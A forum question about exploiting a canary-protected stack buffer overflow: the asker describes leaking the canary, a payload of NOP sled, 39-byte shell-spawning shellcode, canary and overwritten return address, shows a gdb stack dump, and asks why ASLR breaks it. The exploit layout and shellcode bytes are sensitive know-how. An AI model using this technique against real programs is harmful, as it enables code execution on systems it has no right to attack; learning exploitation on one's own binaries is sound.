# Invalid address when overwriting saved rip with buffer's address

Tags: buffer-overflow, shellcode, stack-protector

I have an executable vulnerable to buffer overflows. The program takes a buffer of 104 chars and prints it (unfortunately, there is no format string vulnerability) until we feed it with a 0 or a \n, in that case it just exits.

The program adopts a stack canary mitigation, so I am trying to leak it in order to inject a shellcode. To do so I:

1. Overflow the buffer to leak the canary the first time.
2. Send this payload:

```
NOPx65 + shellcode (39 bytes long) + leaked_canary + "bbbbbbbb" (used to fill the space between canary and sRIP) + <buff_address>
```

This is the stack after sending the payload and pressing enter to stop the execution.

```
0x7ffd2a5d6e80: 0x909090909090900a             0x9090909090909090
0x7ffd2a5d6e90: 0x9090909090909090             0x9090909090909090
0x7ffd2a5d6ea0: 0x9090909090909090             0x9090909090909090
0x7ffd2a5d6eb0: 0x9090909090909090             0x9090909090909090    <-end of NOP sled
0x7ffd2a5d6ec0: 0x48fe89485f12eb90             0x3bb8f2894808c683    <-shellcode
0x7ffd2a5d6ed0: 0xffe9e8050f000000             0x732f6e69622fffff 
0x7ffd2a5d6ee0: 0x0000000000000068             0xdfcedb209c33f900    <-leaked canary
0x7ffd2a5d6ef0: 0x6262626262626262  <-filler   0x00007fffffffddc0    <-sRIP overwritten with buf_address
```

As you can see, at the end of the snippet there is the sRIP overwritten with the buffer address I got from the previous execution. (That means that I launched the first overflow, and I used gdb to find where the buffer resides in memory, that's where I got *<0x00007fffffffddc0>*).

The problem here is that the address above changes as the stack is always random. I think that is the reason why, at the end of the execution I get:

```
Invalid address 0x7fffffffddc0
```

and the program sigfaults.
I need to build a strategy, but I am too inexperienced with this topic. How can I get away with this issue?

Comment: So it seems you're up against ASLR, time to do some reading.